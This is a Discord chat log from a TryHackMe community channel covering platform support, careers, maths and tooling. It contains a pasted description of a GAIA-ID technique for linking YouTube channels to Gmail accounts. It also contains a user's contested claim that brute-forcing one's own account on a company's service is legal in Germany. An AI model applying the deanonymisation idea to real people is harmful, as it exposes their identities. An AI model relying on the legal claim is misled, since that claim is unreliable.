that's up to the owner of the data center to maintain, not organisations that use it
Unfortunately I cannot discuss TryHackMe infrastructure for security reasons, if you have any concerns I would advise you to contact support 🙂
queen flare
Unfortunately I cannot discuss TryHackMe infrastructure for security reasons, if...
thanks, i just want to know about if selecting mumbai server is worse for my data privacy. i guess i'll ask support about it.
twin ridgeBOT
Gave +1 Rep to @mossy river (current: #6 - 1825)
dreamy bronze
what is that
dark mason
what is that
BoF vulnerability
mossy river
BoF vulnerability
Hm? how?
sharp scarab
hey guys, is there a problem to the soc simulator?
i saved my progress and now I went back to it, but when I click on dashboard, the page goes white and nothing else happens
mossy river
hey guys, is there a problem to the soc simulator?
Are you using a free SOC SIM or are you on a b2b account?
sharp scarab
paid premium account, phising unfolding 2
mossy river
You will need to open a ticket with support
dark frost
You will need to open a ticket with support
Would you recommend the Soc certificat ?
mighty granite
when i terminate the machine i don't have target ip
i can use it
it just disappear
like it crushed and after refreshing the page i terminated again
and there's nothing
slow cloud
when i terminate the machine i don't have target ip
well yes, because you terminate the machine
you stop the machine
thus the IP gets removed
mighty granite
i'm confused
slow cloud
about?
mighty granite
oh
i said everything wrong lmao
i meant something different
sorry eng not my first
slow cloud
thats okay
slow cloud
the attackbox or the other machine
mighty granite
and there's no ip
lunar jolt
yo any pro expereinced hackers in here?
mighty granite
attack box
slow cloud
yo any pro expereinced hackers in here?
yeah me
sturdy sequoia
yo any pro expereinced hackers in here?
probably a lot
mighty granite
omg i forgot i have to start machine as well
slow cloud
and there's no ip
the attackbox IP is in the top right
slow cloud
yesss you need to start them both
so you can remote desktop from the attackbox into the other machine
lunar jolt
ethical hacker?
slow cloud
well yeah, we only do ethical things in this server
lunar jolt
ovsly yeah but working for someone
slow cloud
i have worked for someone
lunar jolt
I wanted to ask like how we can look out for jobs as an ethical hacker
slow cloud
Do you have experience in IT, certifications, maybe some projects
lunar jolt
Do you have experience in IT, certifications, maybe some projects
I have enough experience in IT but im looking for certifications and projects as my experience
lunar jolt
Do you have experience in IT, certifications, maybe some projects
I would like some guidance in this field so i wanted to reach out a professional cypherpunk
slow cloud
i think your best bet would be to type out your question, what kind of experience you got etc and post that in #cyber-and-careers people there are more knowledgeable and will be a better guide if they can help
lunar jolt
i think your best bet would be to type out your question, what kind of experienc...
thanks I will
twin ridgeBOT
Gave +1 Rep to @slow cloud (current: #54 - 196)
queen flare
@cloud quiver i do the same thing sometimes for maintaining streak xD
gusty inlet
mighty granite
i'm going insane why attack box works so bad
i need to terminate it and start several times to make it work
swift mulch
dreamy bronze
😂
frozen gull
what should i go for
barren kraken
Hey
marsh lark
@mossy river I forgot to tell you, you know the new beta VM region in Asia? during today's event, I launched my machine in that beta region before the event started, but when I tried an nmap scan (at this point, DKob's stream started and he was also doing an nmap scan), it showed no ports open (without the -p-, so only the top 1000 ports, but still). When terminated the machine, changed the VM location to US East (N. Virginia), that machine did work normally and showed all ports that were supposed to be open
just wanted to let you know
frozen gull
Any have free web pentesting learning resources for get a job
tryhackme xD
safe oxide
Echo branding removed lol?
frozen gull
Any have free web pentesting learning resources for get a job
portswigger
barren kraken
tryhackme xD
Bro I can't have proper roadmap of thm please do some help
frozen gull
Bro I can't have proper roadmap of thm please do some help
wdym no roadmap do pre security then cybersec 101 then go for ur fav category
barren kraken
wdym no roadmap do pre security then cybersec 101 then go for ur fav category
Can we talk in dm
frozen gull
ok
digital estuary
reef mountain
https://discord.com/channels/521382216299839518/690557518837186560
idk must trust or not 🗿
but ok
tawdry fern
wdym?
tawdry fern
Had these pop up after certain challenges
naive crest
hi, I've recently been crawling web because few osint people mentioned that there is a possiblity to find email from youtube account. Found another mention in reddit but could not confirm this method. Has anyone done it before?
YouTube and most Google services uses a special internal identifier known as the GAIA id. When you enter a random Gmail on the login page it will also show the GAIA id in the HTML response. People can theoretically build a list of GAIA IDs from gmails and tie them to the same GAIA ID of YouTube channels to figure out which channel is linked to which Google account. Every Google service tied to a Gmail will always have the same GAIA ID. That means Google drive as well.
slow cloud
why would you need to find a email based on youtube account
naive crest
why would you need to find a email based on youtube account
osint
naive crest
why would you need to find a email based on youtube account
like most of us here learning the offensive side to protect from it, this is the case. Cause some russian osinters admitted there is a method to do it and i never found any references.
slow cloud
no clue
silver sky
like most of us here learning the offensive side to protect from it, this is the...
Russians chat shit on a regular basis, I'd take no notice
loud marlin
@sand trench https://github.com/DreamMaoMao/mangowc might you like it
feral whale
like most of us here learning the offensive side to protect from it, this is the...
I can confirm, that this method indeed exists but leaking it would cause more problems than solving. Its so unknown that i doubt u need it to protect urself or others from it. The only reason u need this information for is to hijack someones account and not to protect urself.
Even if u knew the method, you couldn‘t do anything to protect urself because the Bug thats being abused for this certain method has to be fixxed by Google itself.
naive crest
I can confirm, that this method indeed exists but leaking it would cause more pr...
So you are telling me it's almost like a 0day shit or what?
feral whale
So you are telling me it's almost like a 0day shit or what?
Exactly
marsh lark
who know discrete math?
for what reason?
sand trench
<@228199546050707456> https://github.com/DreamMaoMao/mangowc might you like it
neato... looks like something similar to chadwm for dwm but for dwl instead
glossy holly
for what reason?
inclusion-exclusion
marsh lark
inclusion-exclusion
the tryhackme room?
marsh lark
but like why
loud marlin
neato... looks like something similar to chadwm for dwm but for dwl instead
i just run on it
https://www.youtube.com/watch?v=Q1Jgw_q0gWE
marsh lark
why are u asking @glossy holly
long lotus
i just run on it
https://www.youtube.com/watch?v=Q1Jgw_q0gWE
mango?
loud marlin
mango?<:NotLikeThis:689847725969244171>
window manager
marsh lark
i just run on it
https://www.youtube.com/watch?v=Q1Jgw_q0gWE
wut
loud marlin
wut wut
sand trench
window manager
wayland compositor not window manager
there is some differences
that most people will never care about :P
feral whale
Guys I got a spare laptop would u rather use a machine exclusively for Cyber Security or keep it in a VM?
Well in my case a docker
loud marlin
wayland compositor not window manager
there is some differences
that most people...
yea... i'm sorry my lord 🙂
glossy holly
why are u asking <@1292409470718185576>
i don't understand something tasks
i just think some people know discrete math in this chat
marsh lark
i don't understand something tasks
u can always search them up to understand how they worj
ivory trench
Discrete math is pretty broad. Do you have something specific you are looking to know?
digital estuary
silver sky
What is discrete maths? What does maths have to hide?
digital estuary
hi everyone
long lotus
i love this song (see my profile)
digital estuary
What is discrete maths? What does maths have to hide?
the numbers because one thing for sure is the more advanced math gets the more it becomes reading text rather than numbers
long lotus
hi everyone
glossy holly
Discrete math is pretty broad. Do you have something specific you are looking t...
understand "The principle of Inclusion-Exclusion"
silver sky
the numbers because one thing for sure is the more advanced math gets the more i...
Ahhh yes Y does my maths have letters in it. What is X?
digital estuary
https://tenor.com/view/cat-meme-wave-emoji-cat-wave-cat-wave-gif-178261374743546...
marsh lark
Ahhh yes Y does my maths have letters in it. What is X?
X = Y
digital estuary
Ahhh yes Y does my maths have letters in it. What is X?
equation Y do you still think about your X? drop it
ivory trench
You should check out TrevTutor on YouTube
glossy holly
the numbers because one thing for sure is the more advanced math gets the more i...
yesssss, and proof about your answer
so hard for me
digital estuary
GOD I hate math problems where you have to prove something
marsh lark
GOD I hate math problems where you have to prove something
-# those are easy /j
silver sky
just don't do maths, I've never needed it
digital estuary
-# those are easy /j
keen light
bro i dont think i have done a math problem that was just a raw computation in like 5 years its just proof
glossy holly
GOD I hate math problems where you have to prove something
i just know logical, but can't prrof it
digital estuary
i just know logical, but can't prrof it
its like the dexter doakes meme
glossy holly
its like the dexter doakes meme
xd
digital estuary
rapid merlin
For some reason when I do thm rooms I cant access websites remote machines why ? On my vm
marsh lark
For some reason when I do thm rooms I cant access websites remote machines why ...
try asking in #site-support
mellow narwhal
@cloud quiver / @gusty inlet (or any staff member available)
May I advertise an upcoming CTF here? Starts in an hour, so it's a last minute push for whoever is interested.
marsh lark
https://tenor.com/view/conductor-we-have-a-problem-cat-cute-funny-gif-1716811572...
its not that difficult until you understand how the original mathematicians got there
marsh lark
<@719261261665402921> / <@538468652630933505> (or any staff member available)
Ma...
@mossy river as well 🙂
tired summit
How do i hack
tawdry fern
og math heads representing
mellow narwhal
<@270975958511517697> as well 🙂
Yeah. I didn't know if he was online or not
marsh lark
read #start-here @tired summit
keen light
tawdry fern
answer = easy4
digital estuary
I know the tangerine is a Z...
gusty inlet
<@719261261665402921> / <@538468652630933505> (or any staff member available)
Ma...
Not going to be possible unless Jabba makes an exception which I doubt.
tired summit
read <#806554132117979143> <@1352741255536316416>
Will i be able to hack my old accounts back?
marsh lark
Will i be able to hack my old accounts back?
that is illegal
digital estuary
Will i be able to hack my old accounts back?
feral whale
that is illegal
if those accs are his, it isn't
tired summit
if those accs are his, it isn't
Real
marsh lark
if those accs are his, it isn't
if its a roblox account for instance
is it really yours?
or roblox's?
digital estuary
if those accs are his, it isn't
you do realize you're breaking into a company?
tired summit
Ts mine
feral whale
is it really yours?
by german law its yours
marsh lark
in theiry, to "get back your acount", you have to hack in roblox
technically
which is illegal
feral whale
idk about the laws in yout country
marsh lark
without specific permission
ripe sleet
if its a roblox account for instance
You're in the Fluff clan now Donut?
marsh lark
You're in the Fluff clan now Donut?
yes
digital estuary
Thats like me forgetting my laptop in a school then I decide to break into it late at night
marsh lark
idk about the laws in yout country
it should be no different in germany lol
feral whale
it should be no different in germany lol
in germany every account u create belongs to you. if you bruteforce it for instance
nothing illegal
marsh lark
in germany every account u create belongs to you. if you bruteforce it for insta...
so you're are saying
that if I lose an account because of phishing for instance
I can do everything I can to get that account back
even if it means hacking into the company?
feral whale
the easiest way is by court
marsh lark
well, that is a legal way
marsh lark
"my goodness! let me go sue this company because i lost my account"
exactly
you don't
feral whale
well, that is a legal way
bruteforcing is also legal as long as you bruteforce ur stuff
tawdry fern
let's sue the company
digital estuary
bruteforcing is also legal as long as you bruteforce ur stuff
keypoint YOUR stuff
the company is not yours
feral whale
and the account belongs to the person
marsh lark
and the account belongs to the person
could you show me the exact law that says this
digital estuary
the account is not yours; the account is company property
ripe sleet
You will need to open a ticket with support
Hello Jabba!
feral whale
the account is not yours; the account is company property
no it isn't by german law lmao
the company can write in their tos whatever they want
if you live in germany ur data belongs to u
mellow narwhal
Not going to be possible unless Jabba makes an exception which I doubt.
It's being organized by one of your recruiters, and sponsored by one of your cross-community orgs (I think), if that makes any difference.
tawdry fern
who's property is the account by holy law though? that's the highest instance of law there is
feral whale
ah, your data
credentials are basically ur data
marsh lark
what if the creds are changed?
